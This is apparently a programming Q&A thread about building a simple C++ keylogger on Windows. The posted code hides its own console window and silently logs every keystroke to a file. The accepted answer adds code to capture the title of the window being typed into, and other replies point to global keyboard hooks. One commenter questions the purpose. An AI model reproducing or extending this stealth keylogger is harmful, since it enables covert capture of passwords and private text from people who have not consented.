# C++ simple keylogger

Tags: c++, winapi, keylogger

I`m trying to write a simple keylogger in C++ using WinAPI. Is there a way to get in which application the user is typing the captured key strokes?
And here is my code so far:

```
#include <iostream>
#include <windows.h>
#include <winuser.h>

using namespace std;

int main()
{
    HWND Stealth;
    AllocConsole();
    Stealth = FindWindowA("ConsoleWindowClass", NULL);
    ShowWindow(Stealth,0);
    char i;

while (1)
{
    for(i = 8; i <= 190; i++)
    {
        if (GetAsyncKeyState(i) == -32767)
        {
            FILE *OUTPUT_FILE;
            OUTPUT_FILE = fopen("LOG.txt", "a+");
            int c=static_cast<int>(i);
            fprintf(OUTPUT_FILE, "%s", &c);
            fclose (OUTPUT_FILE);
        }
    }
}
system ("PAUSE");
return 0;
}
```

Comment: There's always `GetForegroundWindow`.

Comment: Why are you making the computer open and close the same file 182 times in a row, as fast as possible?

Comment: By the way, the correct way to check if a key is down right now is `GetAsyncKeyState(i) & 0x8000`.

Comment: You should use a keyboard hook via `SetWindowsHookEx()` to monitor keyboard activity, not `GetAsyncKeyState()` in a loop.

Comment: Congratulations. You just wrote the most CPU-consuming program ever.

Comment: @Zoidberg: No, it uses only one thread, so it will at most only use up one core - and it does file-I/O so probably some system calls, locks and stuff in there to slow it down...

Comment: @Zoidberg, I already did that for fun when I made something to make another process use all the CPU.

Comment: Why are you writing a keylogger? Perhaps there's a better way to solve your problem than doing something that will probably cause your program to be detected as malware.

Answer (score 0, accepted):

Since the question is "Is there a way to get in which application the user is typing the captured key strokes?"
I'd say use HWND WINAPI GetForegroundWindow(void);

For example:

```
char cWindow[MAX_PATH];
GetWindowTextA(GetForegroundWindow(), cWindow, sizeof(cWindow));
```

In cWindow you get the title of the window in which the user is typing.

Answer (score 3):

What you want is a [global keyboard hook](http://msdn.microsoft.com/en-us/library/windows/desktop/ms644959%28v=vs.85%29.aspx)

> A global hook monitors messages for all threads in the same desktop as
>   the calling thread. A thread-specific hook monitors messages for only
>   an individual thread. A global hook procedure can be called in the
>   context of any application in the same desktop as the calling thread,
>   so the procedure must be in a separate DLL module. A thread-specific
>   hook procedure is called only in the context of the associated thread.
>   If an application installs a hook procedure for one of its own
>   threads, the hook procedure can be in either the same module as the
>   rest of the application's code or in a DLL. If the application
>   installs a hook procedure for a thread of a different application, the
>   procedure must be in a DLL. For information, see Dynamic-Link
>   Libraries.